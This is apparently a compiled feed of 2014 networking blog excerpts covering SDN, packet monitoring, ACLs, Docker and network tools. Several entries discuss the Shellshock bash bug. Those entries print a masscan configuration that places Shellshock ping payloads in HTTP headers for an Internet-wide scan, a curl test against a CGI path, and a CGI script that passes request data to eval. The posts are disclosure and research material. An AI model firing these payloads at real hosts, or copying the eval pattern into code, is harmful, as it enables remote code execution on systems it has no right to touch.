Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop debate on October 1st, where we’ll be discussing the choice between pursuing traditional certifications and learning about SDN. Today’s post begins a series on topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it: many days we do the job in front of us, with little time to devote to learning something unrelated. Still, a development plan is a fundamental question for any knowledge-based IT worker. Do you have a development plan? Do you spend time working that plan? And now that SDN is happening, how should you revise that plan? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we get into observed trends, let’s set some context for this post and define what we mean by monitoring. Network monitoring and tapping can be described as “packet capture, packet and session analysis, and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network, but not so much the analysis; tools like Wireshark, Lancope’s Stealth Watch, and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days past (and in most current networks), if you wanted to harvest packets from a network, the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco has tools like the NAM, which comes in several forms, such as a server appliance, a Catalyst 6500 switch module, and an ISR module. The NAM allows you to visually observe network trends and network conversations via generated graphs, and also to inspect traffic by downloading the PCAP files. It is probably one of the more pleasant experiences most people have, alongside Wireshark.
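For readers who have not configured one recently, a minimal sketch of that port-mirroring step on a Cisco IOS switch might look like the following (interface names are placeholders; the Wireshark or NAM box hangs off Gi0/2):

! Local SPAN: copy traffic seen on Gi0/1 to Gi0/2, where the analysis server is attached
monitor session 1 source interface GigabitEthernet0/1 both
monitor session 1 destination interface GigabitEthernet0/2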

Some shortcomings exist with this approach, in that the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to applications and the policies that govern them, I wanted to add some detail on a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application-policy-driven network behaviors. Our Affinities allow you to specify desired behavior between network endpoints, and they will evolve with the enormous amount of policy work Mat described in his three-part article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers, or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and their many variations used for other policy constructs) way back as a mechanism to instruct the switching chips inside their routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has evolved very significantly since then, in Cisco’s implementation and those of many other router and switch vendors.

There are two basic components in an ACL (a small example follows below):

1. What to match a packet on.

2. What action to take once a match is found.
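As a minimal illustration (the addresses and list number are placeholders, not from any particular deployment), a classic Cisco-style extended ACL pairs those two components on every line:

! match: IP traffic from 10.1.1.0/24 to host 192.168.1.10 -> action: deny
access-list 101 deny   ip 10.1.1.0 0.0.0.255 host 192.168.1.10
! match: everything else -> action: permit
access-list 101 permit ip any any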

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known for that long that passing HTTP values to shell scripts is a bad idea.
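To make the class of bug concrete, here is a deliberately naive sketch (an illustration, not any particular site's code) of the kind of CGI shell script that was common back then:

#!/bin/bash
# Hypothetical mid-90s style CGI script: /cgi-bin/finger.cgi
echo "Content-type: text/plain"
echo ""
# QUERY_STRING arrives straight from the HTTP request. Handing it to the
# shell for re-parsing means a request like ?bob;id runs the injected
# command ("id") as well as the intended one.
eval "finger $QUERY_STRING"

That pattern is the 20-year-old mistake the title refers to.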

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet sniffer that gave its name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with the requirements-gathering phase and focuses on physical infrastructure design decisions covering compute, storage, physical and virtual networking, and network services. If you plan to build a private cloud (or a reasonably small public one), start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3,000 systems vulnerable just on port 80, just on the root "/" URL, without a Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- the real number is probably a lot higher.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one), would give a lot more results, at least 10x (a single-endpoint spot check is sketched below, after this list).

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.
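For reference, the kind of single-endpoint spot check mentioned above can be done by hand. This is only a sketch (the hostname is a placeholder); if the CGI behind that URL is handled by a vulnerable bash, the trailing commands execute when bash imports the crafted User-Agent as an environment variable:

curl -A '() { :; }; echo; echo SHELLSHOCK-TEST' http://example.com/cgi-sys/defaultwebpage.cgi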

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Docker Hub Official Repos: Announcing Language Stacks

With Docker containers fast becoming the standard building blocks for distributed apps, we’re working with the Docker community to make it easier for users to quickly code and assemble their projects. Official Repos, publicly downloadable for free from the Docker Hub Registry, are curated images informed by user feedback and best practices. They represent a focused community effort to provide great base images for applications, so developers and sysadmins can focus on building new features and functionality while minimizing repetitive work on commodity scaffolding and plumbing.

At DockerCon last June, we announced the first batch of Official Repos, which covered many standard tools like OS distributions, web servers, and databases. At the time, several organizations joined us to curate Official Repos for their particular projects, including Fedora, CentOS, and Canonical. And the community responded enthusiastically as well: in the three months since they launched, Official Repos have grown so much in popularity that they now account for almost 20% of all image downloads.
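Getting started with one of these curated images is a single pull away; a minimal example, using the centos Official Repo mentioned above:

# Pull the curated CentOS image from the Docker Hub Registry
docker pull centos
# Start an interactive shell in a container based on that image
docker run -it centos /bin/bash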

Parlez-vous…?

Based on the search queries on the Docker Hub Registry and discussions with many of you, we determined that the community wants pre-built stacks of their favorite programming languages.  Specifically, developers Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as its User-Agent. I haven't run a scan for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code: https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier results show that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash vulnerability CVE-2014-6271 patched

This morning, Stephane Chazelas disclosed a vulnerability in the program bash, the GNU Bourne-Again-Shell. This software is widely used, especially on Linux servers, such as the servers used to provide CloudFlare’s performance and security cloud services.

This vulnerability is a serious risk to Internet infrastructure, as it allows remote code execution in many common configurations, and the severity is heightened due to bash being in the default configuration of most Linux servers. While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail, and administration servers. In the case of a web server, a specially formatted web request, when passed by the web server to the bash application, can cause the bash software to run commands on the server for the attacker. More technical information was posted on the oss-sec mailing list.

The security community has assigned this bash vulnerability the ID CVE-2014-6271.
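A commonly circulated way to check whether a particular machine's bash is affected is to define a crafted environment variable and see whether the trailing command gets executed (a local check only, shown here for illustration):

# Prints "vulnerable" on an unpatched bash; a patched bash prints only the test line
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"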

As soon as we became aware of this vulnerability, CloudFlare’s engineering and operations teams tested a patch to protect our servers, and deployed it across our infrastructure. As of now, all CloudFlare servers are protected against CVE-2014-6271.

Everyone who is using the bash software package should upgrade Continue reading

Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

Necessity of Analytics and Monitoring in the SDN Era

by Hariharan Ananthakrishnan, Distinguished Engineer - September 24, 2014

A recent SDNCentral article about the Five Habits of Highly Effective SDN Startups asserts that achieving success in the SDN landscape will require creating focused products that solve real-world problems. In addition, the article emphasizes the need to build a sales channel with great partners, market strategically but be lean and mean, and adopt a slow and steady route into the SDN world. 

The article also laid out the new landscape of SDN as we know it. Take a look at the diagram below. The building blocks range from controllers to network operating systems to monitoring and analytics.



As the above diagram illustrates, monitoring and analytics are key. With SDN, the network self-adapts to the new demands of the application, and without visibility into these changes it’s very hard to say if an SDN application is doing the right things to your network. Understanding the programmable events that happen in real time requires mature analytics technology that can correlate service delivery to physical and virtual resource states. 

At Packet Design, we have been working on a solution for SDN analytics Continue reading

Network Troubleshooting with ThousandEyes

My first experience with ThousandEyes was a year ago at Network Field Day 6, where they were kind enough to give us a tour of their office, and introduce us to their products. I’ve been fairly distracted since then, but kept an eye on what other delegates like Bob McCouch were doing with the product since that demo.

A year later, at Network Field Day 8, they presented again. If you’ve never heard of ThousandEyes, and/or would like an overview, watch the NFD8 introduction from Mohit, the company’s CEO:

Debugging the Internet

One of the things that really stuck out a year ago, and was reinforced tenfold this year, was that ThousandEyes was not introducing any new protocols to the industry – at a time when all of the headlines were talking about new protocols (e.g. OpenFlow). Numerous tech startups – especially those in networking – are in existence purely to tackle the big “software-defined opportunity” gold rush.

Instead, ThousandEyes is focused on network monitoring. If you’re like me, you hear those words and immediately conjure up images of all of the… well, terrible software that exists today to monitor networks. In addition, network monitoring is inherently very fragmented. You can really only Continue reading

Proposed Junos XML Enhancements

I was looking at some Ethernet interface statistics last week when I realized I couldn’t find the output that confirmed the results of Ethernet autonegotiation, just that autonegotiation had been enabled:

john@noisy> show interfaces ge-0/0/0
Physical interface: ge-0/0/0, Enabled, Physical link … Continue reading
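For reference, the same command can be asked for its current XML rendering with the display xml pipe, which is presumably the representation any proposed enhancements would extend (invocation only; output omitted):

john@noisy> show interfaces ge-0/0/0 | display xml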

If you liked this post, please do click through to the source at Proposed Junos XML Enhancements and give me a share/like. Thank you!

Network Automation & Programmability Survey

Many vendors collect their own data that is more than likely a little skewed and biased.  As I prepare for a few upcoming presentations, I thought it would be great to get some REAL data from REAL people doing great things or even those just starting on their automation journey.

If you would be kind enough to fill it out, there is a link to a survey below that asks a few questions pertaining to network automation and programmability.  No personal information is required.

Network Automation & Programmability Survey 

If you wish to see the results, please fill the survey out :)


Thanks in advance,
Jason

Twitter: @jedelman8

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first two parts of this series, you can catch them here and here. The short version is that there are Enterprise customers actively seeking to automate the production deployment of their workloads, which leads them to discover that capturing business policy as part of the process is critical. We’ve arrived at the point where, once policy can be encapsulated in the process of application workload orchestration, it becomes necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to date, networking has largely been about any-to-any, all-equal connectivity (at least in data centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester Research wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading

Network Programmability 101: The Problem

In the first part of the Network Programmability webinar Matt Oswalt described some of the major challenges most networks are facing today:

  • Why is everyone claiming that the network is so slow to change?
  • Is that really the case? Why?
  • Why is the manual configuration culture so widespread in networking?
  • How does the holistic thinking in the design phase dissolve into the box mentality of CLI commands?
  • How does the box mentality limit the scalability of network deployments?

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and when Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened people in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts itself. There are many examples, such as supporting coders' rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace Continue reading
